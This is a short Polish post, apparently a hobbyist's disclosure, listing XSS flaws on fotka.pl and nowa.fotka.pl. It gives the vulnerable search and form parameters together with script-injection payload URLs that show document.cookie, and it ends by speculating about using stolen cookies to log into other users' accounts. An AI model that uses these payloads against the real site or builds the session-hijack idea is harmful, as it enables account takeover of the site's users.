[XSS] Fotka.pl / Nowa.fotka.pl

Cześć otóż trochę poszperałem i znalazłem parę ciekawych błędów.

Pierwszy :


Kod:
www.fotka.pl/szukaj zmienna miejscowosc="><h1><script>alert(document.cookie)</script></h1>

[Obrazek: rlod.jpg]

Drugi :

Kod:
www.fotka.pl/szukaj login&login="><h1><script>alert(document.cookie)</script></h1>

[Obrazek: hlqq.jpg]

Trzeci :

Kod:
http://nowa.fotka.pl/szukaj#r &miejscowosc_id=

[Obrazek: xuqt.jpg]

Czwarty bez kombinowania w POST myślałem na początku że google ma xss,a ale to wina po stronie fotki

Kod:
http://www.fotka.pl/szukaj_google.php?q=test&sa=Szukaj&sitesearch=%22%3E%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/h1%3E%2Fforum%2Fmoje_dyskusje&client=pub-2386558369721555&forid=1&channel=0970824739&ie=UTF-8&oe=UTF-8&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23FFFFFF%3BVLC%3A663399%3BAH%3Acenter ​ %3BBGC%3AFFFFFF%3BLBGC%3AFFFFFF%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT ​%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A11&hl=pl [/img]

Piaty :

[code] http://www.fotka.pl/klubgwiazd/mt zmienne phone_1= ,phone_2= ,phone_3= i f_telefon= są podatne na XSS

[Obrazek: mwmv.jpg]

[Obrazek: zudn.jpg]

[Obrazek: upum.jpg]

to chyba na tyle o ile nie pominąłem jakichś zmiennych podatnych na XSS.

% jeszcze to ale nie wiem czy będzie można to przekierować na konto po zmienieniu w zmiennych na osobę którą chcemy się zalogować + dodania coockies wykradzionych z XSS ale nie jestem pewien

[Obrazek: dfbr.jpg]

Błędy można wykorzystać/uzyskać dopiero po zalogowaniu. Pozdrawiam

0 komentarze:

Prześlij komentarz